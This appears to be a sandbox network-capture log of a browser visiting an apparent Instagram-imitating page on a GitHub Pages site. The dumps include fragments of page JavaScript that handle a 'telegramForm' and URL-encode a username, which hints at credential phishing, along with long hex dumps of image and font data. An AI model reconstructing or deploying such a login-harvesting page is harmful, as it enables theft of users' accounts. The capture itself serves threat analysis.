                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1378INData Raw: 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 28 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 66 6f 72 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 65 6c 65 67 72 61 6d 46 6f 72 6d 27 29 3b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 6c 6f 61 64 69 6e 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6c 6f 61 64 69 6e 67 27 29 3b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 76 61 6c 69 64 54 65 78 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 69 6e 76 61 6c 69 64 22 29 20 0d 0a 20 20 20 20 6c 65 74 20 74 72 79 43 6f 75 6e 74 20 3d 20 30 3b 20 2f 2f 20
                                                                                                                                                                                                                                  Data Ascii: document.addEventListener('DOMContentLoaded', () => { const form = document.getElementById('telegramForm'); const loading = document.getElementById('loading'); const validText = document.querySelector(".invalid") let tryCount = 0; //
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1378INData Raw: b4 d0 b5 d1 80 d0 b6 d0 ba d0 b0 20 d0 bf d0 b5 d1 80 d0 b5 d0 b4 20 d0 be d1 82 d0 bf d1 80 d0 b0 d0 b2 d0 ba d0 be d0 b9 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 49 6e 74 65 72 76 61 6c 28 28 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 6f 61 64 69 6e 67 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 27 66 6c 65 78 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 20 35 30 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 65 6e 63 6f 64 65 64 55 73 65 72 6e 61 6d 65 20 3d 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 75 73 65 72 6e 61 6d 65 2e 76 61 6c 75 65 29 3b 0d 0a 20 20 20 20
                                                                                                                                                                                                                                  Data Ascii: setInterval(() => { loading.style.display = 'flex'; }, 500); const encodedUsername = encodeURIComponent(username.value);
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC456INData Raw: 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 61 74 63 68 28 28 65 72 72 6f 72 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 65 72 74 28 22 45 72 72 6f 72 21 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 3a 20 22 20 2b 20 65 72 72 6f 72 2e 6d 65 73 73 61 67 65 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 72 72 6f 72 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 6f 61 64 69 6e 67 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 27 6e 6f 6e 65 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 73 65 72
                                                                                                                                                                                                                                  Data Ascii: }) .catch((error) => { alert("Error! Please try again: " + error.message); console.log(error); loading.style.display = 'none'; user


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  9192.168.2.649726185.199.108.1534431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC377OUTGET /instagram.com/img/apple-button.png HTTP/1.1
                                                                                                                                                                                                                                  Host: sayidanur.github.io
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC736INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 3754
                                                                                                                                                                                                                                  Server: GitHub.com
                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                  permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                  x-origin-cache: HIT
                                                                                                                                                                                                                                  Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                  ETag: "669df693-eaa"
                                                                                                                                                                                                                                  expires: Sun, 29 Sep 2024 05:03:02 GMT
                                                                                                                                                                                                                                  Cache-Control: max-age=600
                                                                                                                                                                                                                                  x-proxy-cache: MISS
                                                                                                                                                                                                                                  X-GitHub-Request-Id: 2B52:16F5:110D28E:13927BD:66F8DD2D
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:03 GMT
                                                                                                                                                                                                                                  Via: 1.1 varnish
                                                                                                                                                                                                                                  Age: 1
                                                                                                                                                                                                                                  X-Served-By: cache-ewr-kewr1740071-EWR
                                                                                                                                                                                                                                  X-Cache: HIT
                                                                                                                                                                                                                                  X-Cache-Hits: 1
                                                                                                                                                                                                                                  X-Timer: S1727585583.428890,VS0,VE1
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Fastly-Request-ID: 94ed8d636957d868dccefc9a9a586f6c82453fbd
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 32 00 00 00 5a 08 03 00 00 00 0c c8 2a 74 00 00 01 8c 50 4c 54 45 00 00 00 a6 a6 a6 a6 a6 a6 a5 a5 a5 a6 a6 a6 a6 a6 a6 a6 a6 a6 a6 a6 a6 a5 a5 a5 a4 a4 a4 a4 a4 a4 a4 a4 a4 a6 a6 a6 a5 a5 a5 a6 a6 a6 a7 a7 a7 a7 a7 a7 a6 a6 a6 a0 a0 a0 63 63 63 2e 2e 2e 0f 0f 0f 00 00 00 02 02 02 12 12 12 37 37 37 6d 6d 6d a6 a6 a6 a5 a5 a5 a5 a5 a5 72 72 72 1d 1d 1d 83 83 83 5c 5c 5c 05 05 05 89 89 89 a6 a6 a6 29 29 29 80 80 80 4b 4b 4b 1f 1f 1f 32 32 32 90 90 90 d6 d6 d6 fb fb fb 40 40 40 0c 0c 0c 17 17 17 24 24 24 c0 c0 c0 ff ff ff 62 62 62 9e 9e 9e 9c 9c 9c 8c 8c 8c 6b 6b 6b 30 30 30 60 60 60 df df df 86 86 86 fd fd fd 46 46 46 b3 b3 b3 d3 d3 d3 a3 a3 a3 5b 5b 5b 50 50 50 68 68 68 f7 f7 f7 bf bf bf ad ad ad 93
                                                                                                                                                                                                                                  Data Ascii: PNGIHDR2Z*tPLTEccc...777mmmrrr\\\)))KKK222@@@$$$bbbkkk000```FFF[[[PPPhhh
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1378INData Raw: 9b 67 12 aa 4b 26 c7 79 0b 48 64 87 fe 96 da 01 74 b0 e1 81 b3 18 a7 32 c0 a3 ca c9 1e f4 b5 30 05 cc 32 7d 99 92 df d2 a1 65 ef 84 f0 a6 38 d9 07 08 fd e4 8c b5 64 8d 5a b2 6b ae 38 34 e1 9f 91 ac 91 dc ea 4a 01 55 26 73 90 4d 00 ce 73 4d 9c e4 2a 80 56 de b5 b1 13 3e 3a 7a 39 57 21 d9 37 7d 63 9a 64 42 42 8c 7c 03 e0 20 9b 4c de 64 0f 84 0e 53 32 31 d2 00 21 49 2a d5 24 9b e4 a7 9f 78 5c b6 f8 7d 49 af d1 7c e3 b1 9a cc 36 94 5b 89 d1 45 f7 03 20 dd 32 ad 02 90 4e 79 ed b6 c1 ce 8f a3 13 a8 90 4c 7a cb 5d 19 b8 09 70 10 78 20 d7 81 6e 66 93 e1 90 1b 37 40 2c 6e 4e 16 64 68 11 90 3f 32 2e 57 48 f6 89 d7 e5 c9 d6 c9 d5 97 4c 66 fb dc 70 1e e0 c6 ca d0 7b 18 d4 e4 e4 01 85 d0 ee d0 c2 73 c9 6e 7b a2 c7 9b a4 d7 06 21 76 c0 d3 48 f8 07 d9 69 6c b2 c7 5a 22
                                                                                                                                                                                                                                  Data Ascii: gK&yHdt202}e8dZk84JU&sMsM*V>:z9W!7}cdBB| LdS21!I*$x\}I|6[E 2NyLz]px nf7@,nNdh?2.WHLfp{sn{!vHilZ"
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC998INData Raw: 61 97 e4 44 4d c9 3c 21 5a d6 fa d4 69 b7 74 63 8e 97 42 d4 9c ec 10 79 cb 14 3a 8c 77 35 5e f2 3f 37 82 32 2d 8e 00 b3 d6 cc c9 cc 99 c3 25 5f 19 96 8d 8d fe e4 89 93 f5 07 35 25 c3 00 ad ba b5 be 20 a6 a5 c7 93 f9 28 04 8d 64 a6 81 cf 46 e8 32 37 bd 14 42 9e f2 64 5e f3 0b a1 c3 98 5c a1 30 09 dd 0c cb c4 6b 4b d6 ef a6 45 ab 55 ec 76 ef 9f 48 d6 53 55 32 d8 33 14 3a cb 93 bd 2b 49 e6 30 26 57 28 34 3e 71 05 c5 de df 74 19 cb 75 35 bb 90 60 79 32 d3 e7 af 3c d9 19 85 ae 27 4e d0 76 94 27 9b a5 30 5d f2 c5 b4 a3 2c 59 1b 85 33 c5 6c b8 c6 64 9e 0c ad d8 5f 40 05 2e 0a b7 4b 86 30 85 b8 54 48 76 82 bc 2f 45 2b f4 31 f2 7e a3 30 83 47 85 29 f4 94 27 d3 12 6d 23 ef 96 82 bf 2c 59 d2 ea 49 52 eb c9 30 43 2b 7a 9e 3e b9 15 81 41 ce 50 f8 5a 48 76 57 18 4a 53
                                                                                                                                                                                                                                  Data Ascii: aDM<!ZitcBy:w5^?72-%_5% (dF27Bd^\0kKEUvHSU23:+I0&W(4>qtu5`y2<'Nv'0],Y3ld_@.K0THv/E+1~0G)'m#,YIR0C+z>APZHvWJS


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  10192.168.2.649727104.17.25.144431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC657OUTGET /ajax/libs/font-awesome/6.5.2/webfonts/fa-brands-400.woff2 HTTP/1.1
                                                                                                                                                                                                                                  Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://sayidanur.github.io
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: font
                                                                                                                                                                                                                                  Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC949INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:03 GMT
                                                                                                                                                                                                                                  Content-Type: application/octet-stream; charset=utf-8
                                                                                                                                                                                                                                  Content-Length: 117852
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                  ETag: "660cc074-1cc5c"
                                                                                                                                                                                                                                  Last-Modified: Wed, 03 Apr 2024 02:35:32 GMT
                                                                                                                                                                                                                                  cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                  Age: 748720
                                                                                                                                                                                                                                  Expires: Fri, 19 Sep 2025 04:53:03 GMT
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kjVrepzRXi%2FUNnSEToiisq1bVyqseFUyBJzL%2BxfVJc69jZSJXp3gPZW89J599NO%2BE4PJ0gCm2RAQcvvMsQjPGgiKuRlCNfM78r7q4CizrsRlpdwc%2B9gC9Lfs7KOnC6x6iS6ixNjP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8ca95e094ac65e60-EWR
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC420INData Raw: 77 4f 46 32 00 01 00 00 00 01 cc 5c 00 0a 00 00 00 03 18 65 00 01 cc 0f 03 05 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 90 6c 00 a6 3a ca 8b de 38 cb 90 70 05 88 1d 07 20 25 32 8c 71 ec 80 d4 e0 3c 00 00 d4 d6 9f 07 65 44 4f 5a 2d 1e 00 55 55 55 8f 09 c1 dd ab f6 03 10 7e fa e5 37 bf fb c3 9f fe f2 b7 7f fc eb 3f ff fb cb c0 d8 1d 10 cb 76 5c cf 37 fc ff 37 96 de f7 b3 1b 22 b4 85 29 b3 ac 23 10 72 8a 7a 85 8c 90 05 92 53 82 e3 2b 01 5d c2 2d ff 25 dc 32 0f 2f da 7b b1 15 26 a2 ce 44 cc 8b 7c 27 46 92 2b 65 0a 0f 20 9d 5f 2f eb 22 b3 20 4f 92 bb 1f 73 50 93 9e 00 ff d4 3b 7d cf 55 fa ac 91 27 56 48 b1 0a 1c 50 81 36 60 15 90 ec 22 fe 31 a8 80 f8 f7 a0 88 b0 2b af 4b ce 4f ef cc af af 53 a0 12 54 c9 96 a5
                                                                                                                                                                                                                                  Data Ascii: wOF2\e6$ `l:8p %2q<eDOZ-UUU~7?v\77")#rzS+]-%2/{&D|'F+e _/" OsP;}U'VHP6`"1+KOST
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1369INData Raw: b2 6c cb 72 d2 a4 4d 93 dd 94 60 f7 b2 4d 7b 5d a0 2c 63 2f 47 c4 fd bf 47 d0 43 a2 f4 fe f9 55 ea 77 55 dd 5b 75 e9 01 37 cf 4c f7 4c f7 e0 6e bf c6 25 ad c0 72 d6 96 49 32 c4 c2 58 01 29 c0 b2 13 76 a2 10 b1 73 08 37 c9 ff 0e 31 8f fe 42 55 fb 7d bb 8b 5d 00 0b 60 51 3a 41 82 20 45 42 8d 12 21 56 d9 96 2d 39 d5 8e e4 96 fa a5 5c 5c 52 9a 7d b5 ea 9a 2f d7 7a d7 9f 4b ee fb b7 de 24 9e e7 81 fd 5a f7 61 15 67 65 22 fa 4f 35 36 56 63 cf b4 81 2b 67 9d 0c 74 c2 2e 8c c6 c6 46 0f 6b 27 56 ff f5 fc dd 35 30 12 04 90 b3 d2 1c f1 24 26 89 13 44 c0 f3 df dc e7 9d 64 b7 00 f8 4a 34 f9 c0 6e f1 f8 b2 0d 4c e0 43 26 27 33 cb ca d7 b8 0a 5d a3 6b 34 f9 df 97 a5 f5 ed 09 90 5f 28 89 ff 47 e4 08 b9 6e d6 68 b9 55 ab d1 eb 3e e7 3e 5f dc f7 3c cc e6 79 44 2e 3c 22 73
                                                                                                                                                                                                                                  Data Ascii: lrM`M{],c/GGCUwU[u7LLn%rI2X)vs71BU}]`Q:A EB!V-9\\R}/zK$Zage"O56Vc+gt.Fk'V50$&DdJ4nLC&'3]k4_(GnhU>>_<yD.<"s
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1369INData Raw: f0 05 87 bd 07 08 7a 1b 04 10 06 6f 21 33 64 87 bc 50 1a da 40 67 e8 02 5d a1 1b 74 87 1e d0 13 7a 41 6f e8 03 7d a1 1f f4 87 01 30 10 06 c1 60 18 02 43 61 18 0c 87 11 30 12 46 c1 68 18 93 b3 70 ce a6 39 9b e5 6c 9e b3 65 ce 65 5a 98 96 a0 a9 5a 06 ad b6 d6 44 6b a9 4d d5 66 3a ff bb 1e ba 2b b9 3b b9 5f 79 84 a7 8c a7 8e 67 95 67 8d 67 63 5a e1 b4 41 69 fb d3 6e e8 d1 ba 4d cf ab 17 d4 cb eb 95 f5 76 7a 57 7d b0 3e 4e 9f ea ed e9 ed ed 9d ec 9d eb 5d ec 5d e3 7d e6 75 62 02 e6 c2 3c 58 02 cb 61 73 6c 83 3d b0 37 f6 c1 01 38 18 87 e0 30 9c 80 93 70 2a ce c3 a5 b8 12 d7 e0 7a dc 8d 27 f0 3c de c5 17 f8 19 7f a0 81 bf c9 4a 11 a4 50 32 15 a2 22 54 92 2a 50 3d ea 40 9d a9 2f 0d a0 41 34 81 26 d3 6c 5a 4c 4b 69 19 ad a2 35 b4 9d f6 d0 5e da 4f 47 e9 24 5d a7
                                                                                                                                                                                                                                  Data Ascii: zo!3dP@g]tzAo}0`Ca0Fhp9leeZZDkMf:+;_ygggcZAinMvzW}>N]]}ub<Xasl=780p*z'<JP2"T*P=@/A4&lZLKi5^OG$]
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1369INData Raw: fd e7 98 87 c6 b0 39 e6 a5 31 6a 8e f9 68 ac 32 c7 fc 34 d6 9d d0 02 34 36 a0 b1 11 16 a4 71 10 8d e3 6d be 43 e3 24 1a 27 63 25 e6 fe c7 73 ac 42 db db 73 ac 4a fb d2 73 ac 46 fb d6 73 ac 4e fb 27 73 ac 41 47 ef 39 d6 a4 63 d1 39 d6 a2 63 d5 39 d6 a6 e3 92 39 d6 a1 e3 b2 39 d6 a5 e3 ea 09 ac 47 e7 1c 3a e7 c1 fa 74 ee 4d 13 da 90 ce db e9 bc 13 1b d1 f9 22 9d 2f e1 74 17 65 8d b2 8e cd 29 87 50 0e c7 96 94 d3 79 84 6d 29 67 52 ce c6 6d 5f b9 18 e5 12 d8 ec 2b 97 a6 5c 06 87 51 b9 f9 65 8e dd 28 b7 9b 63 77 ca 7d 46 d8 83 f2 30 ca c3 71 d7 57 1e 4b 79 3c d6 a2 e6 4e db 1c 3d 68 ee 32 42 77 9a c7 d0 3c 16 6f 51 f3 74 9e e3 00 9a e7 8e 70 20 cd 4b 68 5e 86 af be e6 bb 34 3f c0 51 d4 9c bb cd 71 24 a9 ff 1c 47 91 a6 cc 31 80 34 ed ab bf 7a 1a a5 05 79 02 47
                                                                                                                                                                                                                                  Data Ascii: 91jh2446qmC$'c%sBsJsFsN'sAG9c9c999G:tM"/te)Pym)gRm_+\Qe(cw}F0qWKy<N=h2Bw<oQtp Kh^4?Qq$G14zyG
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1369INData Raw: f7 30 f3 99 9e d0 cd 1c cc 61 30 54 4f 8d a9 87 a1 99 34 b9 69 e4 8d b4 9e 1e 79 19 27 d2 fa 70 12 56 46 46 0c bd 8c 95 b0 92 8d 67 e3 f6 70 55 65 e8 65 4c f2 6c 3a a9 ca a2 30 94 2b ab 52 6b 5e f1 d2 09 7e d1 e7 1c dc 87 1e 71 3d e9 73 8e 9d 13 91 5b b7 d5 4e a1 f8 8d ab 59 c5 52 4a 3d 54 0f 61 41 5c 4f 5e be ed 73 0e 7b 54 91 9d bf 15 8a be 31 b7 7d 6e e3 4a bd c5 7c 3e 9f 7f 46 57 9f bb 5e c2 04 96 e8 6d 08 85 63 6d 4c ac 94 19 17 23 13 1b 6d 62 1d 73 8b 5b 79 6e 32 6e 59 25 8d b5 36 63 dc 48 79 75 6e 71 65 22 6e a5 49 9e 4d a7 66 94 8e 4c 6a 8c c9 f2 8f ae d2 75 a2 e3 aa b4 ed 23 65 79 6e 8c 19 d5 b9 21 55 59 4d cd a4 2a 8b 85 ef 38 98 c0 48 72 1b 13 cf f5 8f 46 5b 1b 40 28 f6 9a 86 40 ac 9b 51 ec 0b cb 0a 1a ad a8 39 9d ff 4d 10 20 6c b5 95 60 94 59
                                                                                                                                                                                                                                  Data Ascii: 0a0TO4iy'pVFFgpUeeLl:0+Rk^~q=s[NYRJ=TaA\O^s{T1}nJ|>FW^mcmL#mbs[yn2nY%6cHyunqe"nIMfLju#eyn!UYM*8HrF[@(@Q9M l`Y
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1369INData Raw: 54 56 a1 2b 8a 14 6c 68 86 7b ad 66 46 3f fc dc 8d bd 5d 6c 7c 04 c9 e0 eb 1c 21 3d 17 c0 9e 01 32 f8 91 05 3b d8 bf 89 8b 31 94 56 bb 3f e1 02 38 8e 90 de cb b1 f0 1b 57 f0 0e 78 87 87 18 95 8b cc b0 33 2e 1d 8a a7 c3 f5 d9 c3 b9 ff ee fd 27 c1 12 94 32 2e 84 58 2d 03 80 00 66 42 08 0e af 17 42 f0 77 be 93 0b 21 04 a5 6c e1 86 a1 bb 60 94 0a 9d 94 d5 d1 0c 7e 06 66 48 a1 bd a8 ed cc 99 48 a3 1f 59 ee bd af 78 58 63 47 b1 c2 01 40 9c 73 b5 28 db 0c f4 7c d3 f2 0f f1 a4 bd 82 f9 35 fa d0 6a 89 45 66 18 4e e9 10 15 74 c8 2b 4f 26 8c 52 01 7c f5 89 4b fc 99 30 fb 8b b2 5a 3e 31 46 f5 f5 05 8c 60 81 ae a0 bb 78 cc e8 1f 29 d3 a4 03 b1 94 38 15 95 53 44 66 af 30 ba 63 7b 58 be 0c dd 77 cd ee c6 5e 0e 97 75 d4 db dd a8 d5 7d 9d 97 ba f9 be 24 09 9c b9 9f 26 e1
                                                                                                                                                                                                                                  Data Ascii: TV+lh{fF?]l|!=2;1V?8Wx3.'2.X-fBBw!l`~fHHYxXcG@s(|5jEfNt+O&R|K0Z>1F`x)8SDf0c{Xw^u}$&
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1369INData Raw: 2b f1 56 d0 9a 9e fe e3 f2 02 9e 8e b6 f7 87 cb b0 79 e9 e8 19 4f 4a c7 06 f0 9e de ad 40 ef ec df 4c f6 e4 51 ba cf 5c 3d 76 37 6f ba 97 70 97 7d f8 c1 ed a1 cb 68 33 d0 67 03 93 ae cb 5c 8a d8 e3 1f 7e 51 07 2e 27 d8 7e 6a bb d5 04 bc bd 73 f5 a5 c9 9a 44 c7 00 b1 4e c0 28 5c 06 d6 f0 eb 3b f2 24 6f 0c 06 e9 e1 d5 9d 6d 7c b1 80 58 27 89 8e 21 ef 91 fd 5b 38 85 1f 41 5f 8c 87 50 03 3d 3d 32 71 61 50 aa 9f 21 93 3d 76 29 53 21 13 1e cc 22 fb 91 d9 02 82 6d 41 9b 3c 9f 5f 44 b0 da b2 bc 32 dc 64 fc f3 b6 28 61 54 6e 5e c2 d0 ea b4 75 d3 97 96 7f 52 dd 0e 9b ad 88 51 0c 32 39 f2 01 f1 24 77 00 a2 30 92 c7 bd 7d 3e 7b ee f5 fc 93 ea b6 a7 62 21 b9 45 a8 e7 49 37 8a 5c c6 8e 7b f0 ac ec 44 8e eb 34 7c e0 8e 5b ab 6f 6e 0d 66 cd 58 10 9b 73 0c c0 84 27 a5 c5
                                                                                                                                                                                                                                  Data Ascii: +VyOJ@LQ\=v7op}h3g\~Q.'~jsDN(\;$om|X'![8A_P==2qaP!=v)S!"mA<_D2d(aTn^uRQ29$w0}>{b!EI7\{D4|[onfXs'
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1369INData Raw: e3 68 32 9d be 1f f4 7a bd 1e 40 d2 2f e0 b1 c7 6e dd 32 c5 70 30 84 05 1e 0e f6 f7 9a 9e ed 78 22 ea 6d 07 41 a3 dd aa c3 dd a2 9f c0 e6 95 2b 57 e0 ce 38 49 40 ef 1f 1c 5f 1e 8f 2f c3 3b 95 1a 66 e3 f6 c6 56 a7 a3 da 35 6e bb 8d 46 04 49 32 26 66 74 63 66 46 44 df 97 2e 61 09 4b 74 13 a1 50 e7 83 4f 18 2c 1f 5b 55 66 6a b8 51 a6 32 53 53 6a 0d ae 34 7f 57 9b ca 34 83 24 25 df 0b b4 32 da 4c 4d 6e d4 ff bd 7f ff 3e a5 0f 19 3d a3 f4 fe 9f bf 0a b3 87 0c ac fb af fa f3 3f 7f d5 7d 0b d8 43 86 5f f5 e7 f0 f9 87 87 87 94 5e c2 f8 12 a5 87 0f be e6 7f 1c be da c2 97 30 7b 89 c1 d1 e1 d7 7c cd e1 11 b0 97 18 be 84 ad 57 1f fe 8f af 79 80 10 22 08 ad ed ba a6 81 5a a8 44 68 28 a0 8d 92 2b 9d e4 59 3e 0c 82 a0 6f 02 d2 c9 6c 3a a8 37 38 38 32 fb a9 a9 60 cf 93
                                                                                                                                                                                                                                  Data Ascii: h2z@/n2p0x"mA+W8I@_/;fV5nFI2&ftcfFD.aKtPO,[UfjQ2SSj4W4$%2LMn>=?}C_^0{|Wy"ZDh(+Y>ol:7882`
                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1369INData Raw: 70 3e 3e 18 0c 60 d8 9e 6c 36 ef fd a7 9d 9d 1d 25 5c 21 43 15 45 42 40 d0 dd 80 5a bd 33 1a 41 a7 5e 03 68 6d 8e 3d 8f fa 2d 19 38 b6 b4 6c e1 45 a1 90 71 e3 5e cb 7f de 03 6e 39 1e e7 4e cd fb 48 fd d7 5f 51 07 80 7a 1c d7 af 3b 37 1c 57 4a 37 7c f0 e0 c1 83 37 ce 7e 05 21 17 a1 f5 38 e2 ae e0 21 3c 82 ef 80 1f 82 5f 81 3f 80 bf c0 2e 56 38 41 68 98 eb 3c 9b 06 ca 5e 6e 26 66 12 34 57 a5 b9 49 4c b6 1c f2 b7 83 fc f6 c9 1d b9 4d 25 6b ca 4d 92 e7 0d d4 e5 c6 4a 6f 0f 5c e2 26 49 97 e7 2a 6e 22 63 f1 5f a3 cd 48 c5 5a 9b db 0c e4 27 1d a5 dc 24 6b ba 11 1f a9 9b 98 52 6d 22 ce 93 1d 5d 6d 62 25 8a 97 b4 89 d4 b2 2f f4 ed 87 7c 0c ab b7 83 d5 ed 51 67 a4 f4 63 77 ac c7 45 e2 6b 82 ca 8c f5 c8 68 13 17 e3 aa 32 65 a1 8d d4 6e 8e 8b a7 b9 d3 ca 4c 8a b2 6a
                                                                                                                                                                                                                                  Data Ascii: p>>`l6%\!CEB@Z3A^hm=-8lEq^n9NH_Qz;7WJ7|7~!8!<_?.V8Ah<^n&f4WILM%kMJo\&I*n"c_HZ'$kRm"]mb%/|QgcwEkh2enLj
